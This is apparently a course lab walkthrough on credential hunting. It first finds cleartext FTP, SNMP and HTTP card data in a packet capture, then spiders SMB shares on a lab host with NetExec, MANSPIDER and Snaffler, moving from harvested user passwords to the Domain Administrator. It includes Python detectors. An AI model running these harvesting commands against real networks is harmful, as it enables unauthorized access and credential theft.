
# Questions

## Credential Hunting in Network Traffic — Lab Walkthrough

### Setup

Open the provided `.pcapng` file in Wireshark, or run it through Pcredz:

```bash
./Pcredz -f demo.pcapng -t -v
```

***

### Q1 — Credit Card Number in Cleartext

**Approach:** Filter for HTTP POST requests — payment forms submit card data via POST. Search for CVV-related strings to narrow down the exact packet.

**Wireshark filter:**

```
http.request.method == "POST"
```

**Then search inside packets:**

```
Edit → Find Packet → String → "CVV"
```

Or use display filter:

```
http contains "CVV"
```

Check the packet body — the form data will contain card number, expiry, and CVV in plaintext.

***

### Q2 — SNMPv2 Community String

**Approach:** Filter SNMP traffic and look for the community field. Community strings in SNMPv2 are transmitted in cleartext and act as a password for device access.

**Wireshark filter:**

```
snmp
```

**Then search:**

```
Edit → Find Packet → String → "community"
```

The community string appears directly in the SNMP packet fields in the packet details pane.

***

### Q3 — FTP Password

**Approach:** FTP sends credentials in cleartext as separate `USER` and `PASS` commands. Filter for FTP control traffic and search for the PASS command.

**Wireshark filter:**

```
ftp
```

**Then search:**

```
Edit → Find Packet → String → "PASS"
```

The password appears immediately after the `PASS` command in plaintext.

***

### Q4 — File Downloaded over FTP

**Approach:** FTP file transfers use the `RETR` command (retrieve/download). Filter FTP traffic and scroll through — the filename appears in the `RETR` command line.

**Wireshark filter:**

```
ftp
```

Scroll through the filtered results and look for a `RETR <filename>` entry — that's the file the user downloaded.

***

### Wireshark Filter Cheatsheet for This Lab

| Target                  | Filter                                   |
| ----------------------- | ---------------------------------------- |
| HTTP POST requests      | `http.request.method == "POST"`          |
| Search string in HTTP   | `http contains "CVV"`                    |
| SNMP traffic            | `snmp`                                   |
| FTP commands            | `ftp`                                    |
| FTP data transfer       | `ftp-data`                               |
| Follow full FTP session | Right-click packet → Follow → TCP Stream |

***

### Key Takeaways

* **HTTP POST** over plain HTTP exposes everything in the request body — card numbers, passwords, tokens
* **SNMP community strings** are the equivalent of a password for network devices — SNMPv1/v2 sends them in cleartext every single request
* **FTP** has zero encryption by design — `USER`, `PASS`, and all `RETR`/`STOR` commands are plaintext on the wire
* **Pcredz** automates all four of these findings in one command — useful when you have a large capture and need to triage fast
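
As an added example (not part of this walkthrough and not Pcredz's code), a small Python detector that covers the four findings above on payloads already pulled out of a capture: it parses the FTP control commands, the form fields of a cleartext HTTP POST and the SNMP v1/v2c community string straight out of the BER message, and returns nothing for SNMPv3, which carries no community string. The `SAMPLE` packets, port mapping and finding labels are constructed for this example.

```python
import re
from urllib.parse import parse_qs
# Input: (dst_port, payload) pairs already extracted from the .pcapng (e.g. tshark -T fields -e data)
SENSITIVE_FIELD = re.compile(r"card|cvv|pass|pwd|secret|token", re.I)
FTP_CMD = re.compile(r"^(USER|PASS|RETR|STOR)\s+(.+?)\r?$", re.M)

def ber_tlv(data, i):
    # one BER TLV at offset i -> (tag, value, next_offset); short and long definite lengths
    tag, first = data[i], data[i + 1]
    n = first & 0x7F if first & 0x80 else 0             # long form: n = number of length bytes
    length = int.from_bytes(data[i + 2:i + 2 + n], "big") if n else first
    return tag, data[i + 2 + n:i + 2 + n + length], i + 2 + n + length

def snmp_community(payload):
    # SNMP message = SEQUENCE { INTEGER version, OCTET STRING community, PDU }; an SNMPv3
    # message carries a SEQUENCE (msgGlobalData) in that slot instead, so it yields None
    try:
        tag, body, _ = ber_tlv(payload, 0)
        vtag, vval, nxt = ber_tlv(body, 0)
        ctag, cval, _ = ber_tlv(body, nxt)
    except IndexError:
        return None
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04):
        return None
    return {0: "v1", 1: "v2c"}.get(int.from_bytes(vval, "big"), "unknown"), cval.decode("latin-1")

def http_post_fields(payload):
    # sensitive-looking form fields from a cleartext HTTP POST body (the Q1 card/CVV case)
    text = payload.decode("latin-1")
    if not text.startswith("POST ") or "\r\n\r\n" not in text:
        return {}
    return {k: v[0] for k, v in parse_qs(text.split("\r\n\r\n", 1)[1]).items() if SENSITIVE_FIELD.search(k)}

def hunt(packets):
    # returns (finding_type, detail) tuples, roughly what Pcredz reports for the same traffic
    findings = []
    for port, payload in packets:
        if port == 21:                                   # FTP control channel: USER/PASS/RETR/STOR
            findings += [(f"ftp-{c.lower()}", a) for c, a in FTP_CMD.findall(payload.decode("latin-1"))]
        elif port == 80:
            findings += [("http-post-field", f"{k}={v}") for k, v in http_post_fields(payload).items()]
        elif port == 161 and (res := snmp_community(payload)):
            findings.append((f"snmp-{res[0]}-community", res[1]))
    return findings

SAMPLE = [  # constructed packets for this example, not from the lab capture
    (21, b"USER ftpuser\r\n"), (21, b"PASS S3cretFTP!\r\n"), (21, b"RETR backup_2024.zip\r\n"),
    (80, b"POST /checkout HTTP/1.1\r\nHost: shop.example\r\n\r\ncard=4111111111111111&exp=12%2F27&CVV=123"),
    (161, bytes.fromhex("301802010104067075626c6963a00b0201010201000201003000")),  # v2c GetRequest, "public"
]
```

Running `hunt(SAMPLE)` yields one finding per FTP command, one per sensitive POST field and one for the community string; feeding it SNMPv3 or encrypted traffic yields nothing, which is the point of the takeaways above.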

## Credential Hunting in Network Shares — Lab Walkthrough

### Environment

| Detail        | Value                            |
| ------------- | -------------------------------- |
| Target IP     | `10.129.234.173`                 |
| Initial creds | `mendres` : `Inlanefreight2025!` |
| Domain        | `INLANEFREIGHT.LOCAL`            |

***

### Q1 — Find Domain User Password (jbader)

#### Step 1 — Enumerate Accessible Shares

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --shares
```

Confirms READ access to: `IT`, `HR`, `Company`, `NETLOGON`, `SYSVOL`

***

#### Step 2 — Search IT Share for Credentials

**Method 1 — NetExec spider:**

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "password"
```

**Method 2 — NetExec with domain pattern:**

```bash
nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "INLANEFREIGHT\\"
```

**Method 3 — PowerShell (if on Windows foothold):**

```powershell
Get-ChildItem -Recurse -Include *.* \\10.129.234.173\IT | Select-String -Pattern "INLANEFREIGHT\\"
```

**Method 4 — MANSPIDER (from Linux):**

```bash
docker run --rm -v ./manspider:/root/.manspider \
  blacklanternsecurity/manspider \
  10.129.234.173 -c 'INLANEFREIGHT' -u mendres -p 'Inlanefreight2025!'
```

**Method 5 — Snaffler (from domain-joined Windows machine):**

```powershell
# Target the IT share only for speed (-i takes a UNC share path and skips computer discovery)
.\Snaffler.exe -s -i \\10.129.234.173\IT -o snaffler_q1.log

# Review output for credential hits (Select-String uses .NET regex, so "|" is an unescaped alternation)
Select-String -Path snaffler_q1.log -Pattern "password|INLANEFREIGHT|jbader"
```

***

#### Result

File: `IT\Tools\split_tunnel.txt`

```
# Auth backup password: INLANEFREIGHT\jbader:ILovePower333###
```

| Field    | Value              |
| -------- | ------------------ |
| Username | `jbader`           |
| Password | `ILovePower333###` |

***

### Q2 — Find Domain Administrator Password

#### Step 1 — Search HR Share as jbader

**Method 1 — NetExec spider:**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "Administrator"
```

**Method 2 — NetExec with broader pattern:**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "passw"
```

**Method 3 — MANSPIDER:**

```bash
docker run --rm -v ./manspider:/root/.manspider \
  blacklanternsecurity/manspider \
  10.129.234.173 -c 'Administrator' -u jbader -p 'ILovePower333###'
```

**Method 4 — Snaffler (from domain-joined machine, now authenticated as jbader):**

```powershell
# Run as jbader: Snaffler uses the current user token automatically (-i takes a UNC share path)
.\Snaffler.exe -s -i \\10.129.234.173\HR -o snaffler_q2.log

# Review (Select-String uses .NET regex, so "|" is an unescaped alternation)
Select-String -Path snaffler_q2.log -Pattern "Administrator|Onboarding|Confidential"
```

Snaffler will flag `Onboarding_Docs_132.txt` in **Red** because:

* Located inside a `Confidential` folder — triggers Snaffler's naming rules
* Contains the keyword `Administrator` — matches `KeepPassOrKeyInCode` rule

**Method 5 — PowerHuntShares (generates HTML report):**

```powershell
Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\Users\Public
# Open the HTML report and filter for HR share findings
```

***

#### Step 2 — Download the File

**smbclient:**

```bash
smbclient //10.129.234.173/HR -U jbader
# Password: ILovePower333###

smb: \> cd Confidential
smb: \Confidential\> get Onboarding_Docs_132.txt
smb: \Confidential\> exit
```

**NetExec (view without downloading):**

```bash
nxc smb 10.129.234.173 -u jbader -p 'ILovePower333###' --spider HR --content --pattern "Administrator" -v
```

***

#### Result

File: `HR\Confidential\Onboarding_Docs_132.txt`

Contains the Domain Administrator password in cleartext.

***

### Full Attack Chain

```
mendres:Inlanefreight2025! (initial creds)
        │
        └── Spider IT share → split_tunnel.txt
                │
                └── jbader:ILovePower333###
                        │
                        └── Spider HR share → HR\Confidential\Onboarding_Docs_132.txt
                                │
                                └── Administrator:<password>
```

***

### Tool Comparison for This Lab

| Tool                       | Command style                  | Best for                                    |
| -------------------------- | ------------------------------ | ------------------------------------------- |
| `nxc --spider`             | Remote, Linux                  | Quick targeted pattern search               |
| MANSPIDER                  | Remote, Linux (Docker)         | Broad crawl, downloads loot                 |
| Snaffler                   | Local, Windows (domain-joined) | Auto-discovers all shares, color-coded hits |
| PowerHuntShares            | Local, Windows                 | HTML report, permission analysis            |
| `smbclient`                | Remote, Linux                  | Manual file retrieval after finding target  |
| PowerShell `Select-String` | Local, Windows                 | Simple recursive search on mounted share    |

***

### Key Takeaways

* Always **re-enumerate shares after getting new credentials** — `jbader` had HR access that `mendres` did not
* **IT shares** are the highest-value target for domain user credentials — scripts and config files hardcode them constantly
* **HR shares** frequently contain onboarding documents with default/initial passwords for privileged accounts
* Snaffler's **Red** classification catches both credential patterns in code AND sensitive folder names like `Confidential` automatically
* Pattern search with `INLANEFREIGHT\\` is more precise than `passw` on a domain — filters out noise and finds domain-formatted credentials directly
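
As an added example (not the walkthrough's code, nor Snaffler's or NetExec's), a Python scanner that applies the takeaways above to files from a share mounted locally: a `DOMAIN\user:pass` string rates highest, a bare `passw` keyword rates lower on its own, a sensitive folder name such as `Confidential` or `HR` raises the rating, and the report masks the secret itself. The share layout and every value in it are constructed; `DOMAIN`, `SENSITIVE_DIRS`, `TEXT_EXT` and the rating names are assumptions made for this example.

```python
import re, tempfile
from pathlib import Path

DOMAIN = "INLANEFREIGHT"
# Loosely modelled on the walkthrough: domain-formatted creds beat bare keywords; sensitive folders raise the rating
DOMAIN_CRED = re.compile(rf"{DOMAIN}\\(\w+):(\S+)")
KEYWORD = re.compile(r"passw", re.I)
SENSITIVE_DIRS = {"confidential", "onboarding", "hr"}
TEXT_EXT = {".txt", ".ps1", ".bat", ".cfg", ".ini", ".xml", ".config"}

def rate_file(path, root):
    rel = path.relative_to(root)
    if path.suffix.lower() not in TEXT_EXT or path.stat().st_size > 5_000_000:
        return None                                      # skip binaries and very large files
    text = path.read_text(errors="replace")
    hits = [f"{u}:{'*' * len(p)}" for u, p in DOMAIN_CRED.findall(text)]   # mask the secret in the report
    in_sensitive = any(part.lower() in SENSITIVE_DIRS for part in rel.parts[:-1])
    if hits:
        rating = "red"
    elif KEYWORD.search(text):
        rating = "red" if in_sensitive else "yellow"
    elif in_sensitive:
        rating = "green"
    else:
        return None
    return {"file": rel.as_posix(), "rating": rating, "creds": hits}

def scan_share(root):
    root = Path(root)
    results = [rate_file(p, root) for p in root.rglob("*") if p.is_file()]
    return sorted((r for r in results if r), key=lambda r: ("red", "yellow", "green").index(r["rating"]))

def build_sample_share(base):
    # constructed files that mimic the lab's share layout; every value here is made up
    files = {
        "IT/Tools/split_tunnel.txt": f"# Auth backup password: {DOMAIN}\\svc_vpn:Example-VPN-Pass1\n",
        "HR/Confidential/Onboarding_Docs_132.txt": "Initial Administrator password: set at first logon\n",
        "Company/setup_notes.txt": "Password policy: 14 characters minimum\n",
        "Company/newsletter.txt": "Welcome to the team! No secrets here.\n",
    }
    for rel, content in files.items():
        p = Path(base, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return base

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return scan_share(build_sample_share(tmp))
```

Point `scan_share()` at a mounted share instead of the temp directory to audit it; the masked `creds` field tells you which files need the credential rotated and removed without copying the secret into the report.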


